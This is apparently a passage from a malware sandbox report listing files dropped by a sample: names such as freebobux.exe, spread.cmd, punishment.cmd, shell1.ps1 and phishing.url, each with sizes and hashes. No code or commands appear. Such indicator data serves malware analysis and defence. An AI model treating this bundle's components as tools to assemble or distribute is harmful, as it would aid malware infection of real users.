                                                                                                                                                                                                                                                            14KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            4c195d5591f6d61265df08a3733de3a2

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            38d782fd98f596f5bf4963b930f946cf7fc96162

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            94346a0e38b0c2ccd03cf9429d1c1bce2562c29110bb29a9b0befc6923618146

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            10ee2e62ca1efa1cda51ca380a36dfabdd2e72cec41299369cac95fc3864ca5f4faa959f70d2b2c145430e591b1249f233b31bd78ba9ee64cf0604c887b674d7

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\export\1\i.txt

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            6KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            d40fc822339d01f2abcc5493ac101c94

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            83d77b6dc9d041cc5db064da4cae1e287a80b9e6

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            b28af33bc028474586bb62da7d4991ddd6f898df7719edb7b2dfce3d0ea1d8c6

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            5701c2a68f989e56e7a38e13910421c8605bc7b58ae9b87c1d15375829e100bad4ac86186f9d5670c9a5e0dd3e46f097d1d276e62d878e0c2f6eb5f6db77dd46

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\export\2\CODE2000.TTF

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            3.0MB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            052eaff1c80993c8f7dca4ff94bb83ca

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            62a148210e0103b860b7c3257a18500dff86cb83

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            afabc4e845085d6b4f72a9de672d752c002273b52221a10caf90d8cb03334f3c

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            57209c40b55170da437ab1120b2f486d698084d7d572b14889b2184e8327010a94eee25a86c9e0156ba12ed1a680507016390f059f265cceb3aa8698e8e94764

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\export\2\readme.txt

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            d6b389a0317505945493b4bfc71c6d51

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            a2027bc409269b90f4e33bb243adeb28f7e1e37b

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            d94ed2f7aa948e79e643631e0cd73cf6a221790c05b50ad1d6220965d85ac67c

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            4ea3c8bdee2b9e093d511a7e4ded557f182df8d96e798cb9ee95014f3b99ebd21f889516e5f934033b01b7ca1e26f5444f2e6be0cc0d7fba0b3faa4cea40e187

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\export\3\IMG_1344.MP4

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            448KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            038725879c68a8ebe2eaa26879c65574

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            34062adf5ac391effba12d2cfd9f349b56fd12dc

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            eec8517fe10284368ed5c5b38b7998f573cc6a9d06ae535fe0057523819788be

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            7b494cd77cb3f2aff8fd6aa68a9ba5cfc87fcaefa36b882e2f930bf82029526257c41a5205364cafc66f4c0f5d154cc1dfe44a6db06952075047975e2156e564

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\export\3\IMG_1598.MP4

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            1.5MB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            808c2e1e12ddd159f91ed334725890f4

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            96522421df4eb56c6d069a29fa4e1202c54eb4e4

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            5588c6bf5b74c0a8b088787a536ef729bcedaedfc554ef317beea7fca3b392f7

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            f6205b07c68f3b6abe7daf0517fbc07def4cb471bd754cd25333f5301dc9f1ac439217c6a09c875376ece4f6fb348e8b9e44e6e8a813ac5d8078cedc5b60bb3c

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\export\3\IMG_1599.MP4

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            2.7MB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            06947b925a582d2180ed7be2ba196377

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            34f35738fdf5c51fa28093ee06be4c12fcbd9fda

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            b09bd14497d3926dc3717db9a3607c3cec161cc5b73c1af7e63d9ccce982a431

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            27f6e3882db9f88834023ff3ece9f39cb041548e772af89d49c97fea7d7ceb4f2efdc019a89c0edf3308929a88fd488749fec97c63b836de136c437300b9ff73

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\export\3\IMG_1689.MP4

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            1.8MB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            1e5c2785bd0dd68ba46ddca622960eb5

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            f99901491d60b748c470dca28f4f7d423eaa42e0

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            1e199487c53b09a93d573ff9eee56aadb70de38ffa8d2d89001dca9ab8fdac96

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            dbb768da8ddc14b5ffbda956258296a4f94cb49775c03cfe5f9e64e402938ec1c045685a14e44294cb31520c4c389d6c742f3f47e2acb46d0d9e96ec1ff4c58e

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\export\3\IMG_1741.MP4

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            2.4MB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            5bf2d9277e2aaaf852d4b65d1e9bba67

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            5d8876a9c641fc67b1f5fd23da079952fa879cfd

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            3fbbdfbaa057533ad30787257bd31252fad8bfaaafabcd78473196d9b8fc6820

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            848e43d7b0968b0e096e01078db51e029dc8014800a738fee43e39c7bf76ee616347424349a9a5a79af1af46c7f8c01501a6765746326f41a69791de5300523c

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\export\3\IMG_1870.MP4

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            2.9MB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            092a111c6a159e3cb263fdaa9781c9d5

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            fdeeb752db60e5e299e54b46c932908507dd2615

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            54ca5ae616974ce576379652479c7b74817c6ed35ba150e5fa19ca92c995324c

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            24a27b7c3b92607aa69aa2a329b1063278d48ef6d61baa6f3fa41ec50aa36968bc5897e0c2db22e1fc6b9e92a11365b796f2c47197b4c1187e953535fdd40982

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\export\3\IMG_5049.MP4

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            956KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            1649d1b2b5b360ee5f22bb9e8b3cd54c

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            ae18b6bf3bfa29b54fee35a321162d425179fc7e

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            d1304d5a157d662764394ca6f89dcad493c747f800c0302bbd752bf61929044e

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            c77b5bad117fda5913866be9df54505698f40ef78bf75dad8a077c33b13955222693e6bc5f4b5b153cfb54ff4d743403b1fd161270fa01ad47e18c2414c3d409

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\export\3\IMG_5068.MP4

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4.3MB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            91eb9128663e8d3943a556868456f787

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            b046c52869c0ddcaec3de0cf04a0349dfa3bd9c3

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            f5448c8e4f08fa58cb2425ab61705ade8d56a6947124dea957941e5f37356cd3

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            c0d7196f852fc0434b2d111e3cf11c9fd2cb27485132b7ce22513fe3c87d5ad0767b8f35c36948556bce27dcc1b4aa21fbb21414637f13071d45f18c9ae32bf6

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\export\3\IMG_5343.MP4

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            1.7MB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            180722cbf398f04e781f85e0155fa197

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            77183c68a012f869c1f15ba91d959d663f23232d

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            94e998cedbbb024b3c7022492db05910e868bb0683d963236163c984aa88e02a

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            bbece30927da877f7c103e0742466cda4b232fb69b2bf8ebe66a13bf625f5a66e131716b3a243bb5e25d89bd4bde0b004da8dd76200204c67a3d641e8087451d

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\export\spread.cmd

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            104B

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            7a71a7e1d8c6edf926a0437e49ae4319

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            d9b7a4f0ed4c52c9fbe8e3970140b47f4be0b5f1

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            e0d127c00f9679fb359c04b6238b976f1541918a0df0d6c61f1a44e8f27846ae

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            96a57412bda3f16e56398cd146ece11e3d42291dceff2aec22871a7e35e3b102b27151984ae0795ca6d5ef5385ef780906d9b13cec78cbbdf019a3de4792ca3a

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\f3cb220f1aaa32ca310586e5f62dcab1.pack

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            894KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            34a66c4ec94dbdc4f84b4e6768aebf4e

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            d6f58b372433ad5e49a20c85466f9fb3627abff2

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            fcf530e33a354ac1de143e2f87960e85f694e99d7aa652408c146e8d0a1430fb

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            4db51769dcee999baf3048c793dde9ad86c76f09fc17edd8e2f1dedf91cf224ddfbe9554c4ff14659ea0f6663b054953ec2ab9d964e6e9ca44ee744e02b7e5b9

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\freebobux.exe

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            779KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            794b00893a1b95ade9379710821ac1a4

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            85c7b2c351700457e3d6a21032dfd971ccb9b09d

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            5ac42d75e244d33856971120a25bd77f2c0712177384dfa61fb90c0e7790d34c

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            3774d4aed0cce7ed257d31a2bb65dda585d142c3c527dc32b40064d22d9d298dd183c52603561c9c1e96dd02737a8b2237c433cf7a74dccb0a25191446d60017

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\handler.cmd

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            225B

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            c1e3b759a113d2e67d87468b079da7dc

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            3b280e1c66c7008b4f123b3be3aeb635d4ab17c3

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            b434261414e7c75437e8c47aba9a5b73fcb8cffbf0870998f50edc46084d1da5

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            20a1494027a5cf10f4cc71722a7a4e685fc7714ba08598dd150c545f644e139ddb200fb0b5517f5491a70d8644e90c8f60e8c457bc5d8eb0bb451120b40b8447

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\helper.vbs

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            26B

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            7a97744bc621cf22890e2aebd10fd5c8

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            1147c8df448fe73da6aa6c396c5c53457df87620

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            153fed1733e81de7f9d221a1584a78999baa93bc8697500d8923550c774ed709

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            89c73b73d4b52cf8e940fa2f1580fdc89f902b1eeb4b2abc17f09229a6130532a08cdb91205b9813a65cb7cd31ca020fe728b03d9a0fabb71131864c2966f967

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\install.exe

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            878B

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            1e800303c5590d814552548aaeca5ee1

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            1f57986f6794cd13251e2c8e17d9e00791209176

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            7d815f37d808bc350a3c49810491d5df0382409347ebae7a3064a535d485c534

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            138009bc110e70983d2f7f4e0aba0ee7582b46491513aae423461b13c5a186efcf8cdf82a91980302d1c80e7bae00e65fb52a746a0f9af17a8eb663be04bb23e

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\jaffa.exe

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            512KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            6b1b6c081780047b333e1e9fb8e473b6

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            8c31629bd4a4ee29b7ec1e1487fed087f5e4b1de

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            e649b6e4284404bfa04639b8bf06367777c48201ef27dcdc256fe59167935fac

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            022d40c1801fa495c9298d896221c8eefbad342d41922df8d014f2f49c3fe7fa91d603e0ee0de6be6f2143f9e0c4a6756b19260166ebd62ec3e1c64ad22bc447

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\jkka.exe

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            1002KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            42e4b26357361615b96afde69a5f0cc3

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            35346fe0787f14236296b469bf2fed5c24a1a53d

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            e58a07965ef711fc60ab82ac805cfc3926e105460356dbbea532ba3d9f2080eb

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            fb8a2f4a9f280c0e3c0bb979016c11ea217bae9cebd06f7f2b5ef7b8973b98128ebc2e5cf76b824d71b889fca4510111a79b177dab592f332131f0d6789673a5

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\lupa.png

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            5KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            0a9d964a322ad35b99505a03e962e39a

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            1b5fed1e04fc22dea2ae82a07c4cfd25b043fc51

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            48cdea2dd75a0def891f0d5a2b3e6c611cfe0985125ac60915f3da7cacb2cd2b

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            c4c9f019928f5f022e51b3f8eb7a45f4a35e609c66a41efc8df937762b78a47fc91736fac1a03003ca85113411f4b647a69605e66c73c778d98c842799e65d0d

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\phishing.url

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            6f62e208aad51e2d5ef2a12427b36948

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            453eaf5afef9e82e2f50e0158e94cc1679b21bea

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            cf0b709df6dfcb49d30e8bc0b9893aa9bd360e5894e08915b211829d2ae8536b

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            f4732026625df183377c0c32baec3b663582d59ae59687d426d7637b5d701b3a169e0769b0106f8d9d8b42691697f12d0ed73a607f7bcd99d1f210ec98408501

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\punishment.cmd

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            200B

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            c8d2a5c6fe3c8efa8afc51e12cf9d864

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            5d94a4725a5eebb81cfa76100eb6e226fa583201

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            c2a655fef120a54658b2559c8344605a1ca4332df6079544ff3df91b7ecadbdb

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            59e525a5296160b22b2d94a3a1cfb842f54fc08a9eb3dbcda7fd9e7355842eae86b7d478175fc06ee35d7836110e1091522daf523aeb2e6d851ee896770cd8b5

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\punishment.vbs

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            97B

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            c38e912e4423834aba9e3ce5cd93114b

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            eab7bf293738d535bb447e375811d6daccc37a11

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            c578d53f5dd1b954bce9c4a176c00f6f84424158b9990af2acb94f3060d78cc1

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            5df1c1925d862c41822b45ae51f7b3ed08e0bc54cb38a41422d5e3faf4860d3d849b1c9bbadffa2fc88ee41a927e36cd7fcf9cd92c18753e3e2f02677ec50796

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\readme.md

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            167B

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            5ae93516939cd47ccc5e99aa9429067c

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            3579225f7f8c066994d11b57c5f5f14f829a497f

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            f815e2d4180ba6f5d96ab9694602ac42cde288b349cf98a90aad9bd76cc07589

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            c2dd5a075d1d203d67752a3fff5661863d7da6c2d3d88f5d428f0b32c57df750c24459a782174b013a89bbfbf84d8fb964a2bec06fc0609dc44cc10519e62713

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\regmess.exe

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            536KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            5c4d7e6d02ec8f694348440b4b67cc45

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            be708ac13886757024dd2288ddd30221aed2ed86

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            faaa078106581114b3895fa8cf857b2cddc9bfc37242c53393e34c08347b8018

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            71f990fe09bf8198f19cc442d488123e95f45e201a101d01f011bd8cdf99d6ccd2d0df233da7a0b482eab0595b34e234f4d14df60650c64f0ba0971b8345b41f

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\scary.exe

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            3.1MB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            97cd39b10b06129cb419a72e1a1827b0

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            d05b2d7cfdf8b12746ffc7a59be36634852390bd

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            6bc108ddb31a255fdd5d1e1047dcd81bc7d7e78c96f7afa9362cecbb0a5b3dbc

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            266d5c0eb0264b82d703d7b5dc22c9e040da239aaca1691f7e193f5391d7bafc441aff3529e42e84421cf80a8d5fca92c2b63019c3a475080744c7f100ea0233

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\screenshot.png

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            266KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            de8ddeeb9df6efab37b7f52fe5fb4988

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            61f3aac4681b94928bc4c2ddb0f405b08a8ade46

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            47b5cbeb94eaec10a7c52458195d5ba7e2e53d732e9e750f1092eb016fd65159

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            6f8e30ddb646ea5685b0f622b143cdd7bc5574a765f4f14797df45739afcdefaba7786bac9ad8637c64893a33f14e5adcfb3af5869fc10c105760a844108e27e

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\selfaware.exe

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            797KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            5cb9ba5071d1e96c85c7f79254e54908

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            3470b95d97fb7f1720be55e033d479d6623aede2

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            53b21dcfad586cdcb2bb08d0cfe62f0302662ebe48d3663d591800cf3e8469a5

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            70d4f6c62492209d497848cf0e0204b463406c5d4edf7d5842a8aa2e7d4edb2090f2d27862841a217786e6813198d35ea29b055e0118b73af516edf0c79dcfad

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\shell1.ps1

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            356B

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            29a3efd5dbe76b1c4bbc2964f9e15b08

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            02c2fc64c69ab63a7a8e9f0d5d55fe268c36c879

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            923ad6ca118422ee9c48b3cc23576ee3c74d44c0e321a60dc6c2f49921aea129

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            dfa3cdaab6cc78dddf378029fdb099e4bb1d9dcad95bd6cd193eca7578c9d0de832ae93c5f2035bc6e000299ad4a157cc58e6b082287e53df94dcc9ddbab7c96

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\spinner.gif

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            44KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            324f8384507560259aaa182eb0c7f94a

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            3b86304767e541ddb32fdda2e9996d8dbeca16ed

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            f48c4f9c5fc87e8d7679948439544a97f1539b423860e7c7470bd9b563aceab5

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            cc1b61df496cfb7c51d268139c6853d05bace6f733bc13c757c87cd64a11933c3a673b97fba778e515a9ff5f8c4ea52e7091f3beda1d8452bc3f6b59382f300d

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\stopwerfault.cmd

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            42B

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            7eacd2dee5a6b83d43029bf620a0cafa

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            9d4561fa2ccf14e05265c288d8e7caa7a3df7354

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            d2ac09afa380a364682b69e5d5f6d30bb0070ca0148f4077204c604c8bfae03b

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            fd446a8968b528215df7c7982d8dae208b0d8741410d7911023acee6ad78fee4fdec423a5f85dd00972a6ac06b24a63518f741490deab97639628b19256791f8

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\the.exe

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            764KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            e45dcabc64578b3cf27c5338f26862f1

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            1c376ec14025cabe24672620dcb941684fbd42b3

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            b05176b5e31e9e9f133235deb31110798097e21387d17b1def7c3e2780bbf455

                                                                                                                                                                                                                                                            SHA512

